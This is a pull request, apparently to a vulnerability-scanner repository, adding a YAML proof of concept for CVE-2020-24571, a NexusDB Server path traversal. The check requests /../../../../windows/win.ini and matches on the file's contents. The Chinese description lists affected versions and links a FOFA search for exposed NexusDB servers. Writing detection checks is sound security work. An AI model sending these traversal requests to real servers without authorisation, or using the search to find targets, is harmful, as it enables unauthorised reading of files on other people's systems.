### PR TITLE
Create nexusdb-cve-2020-24571-pathtraversal.yml

### DIFF
--- a/pocs/nexusdb-cve-2020-24571-path-traversal.yml
+++ b/pocs/nexusdb-cve-2020-24571-path-traversal.yml
@@ -1,11 +1,10 @@
-name: poc-yaml-nexusdb-cve-2020-24571-pathtraversal
+name: poc-yaml-nexusdb-cve-2020-24571-path-traversal
 rules:
   - method: GET
     path: /../../../../../../../../windows/win.ini
     follow_redirects: true
     expression: >
-      response.status == 200 && response.body.bcontains(bytes("; for 16-bit app
-      support")) && response.content_type.contains("application/octet-stream")
+      response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream")
 detail:
   author: su(https://suzzz112113.github.io/#blog)
   links:

--- a/pocs/nexusdb-cve-2020-24571-pathtraversal.yml
+++ b/pocs/nexusdb-cve-2020-24571-pathtraversal.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-nexusdb-cve-2020-24571-pathtraversal
+rules:
+  - method: GET
+    path: /../../../../../../../../windows/win.ini
+    follow_redirects: true
+    expression: >
+      response.status == 200 && response.body.bcontains(bytes("; for 16-bit app
+      support")) && response.content_type.contains("application/octet-stream")
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
   检测NexusDB Server及NexusDB Edition存在目录穿越漏洞的poc. cve-2020-24571更新于2020-08-21 。

## 测试环境
http://fofa.so/result?q=%22Server%3A+NexusDB%22&qbase64=IlNlcnZlcjogTmV4dXNEQiI%3D 或者自建。
## 备注
    影响版本：
      NexusDB Server  <=v4.50.22 Release
![image](https://user-images.githubusercontent.com/26242452/90890816-4570dc00-e3ed-11ea-8921-95496bf5a9b6.png)
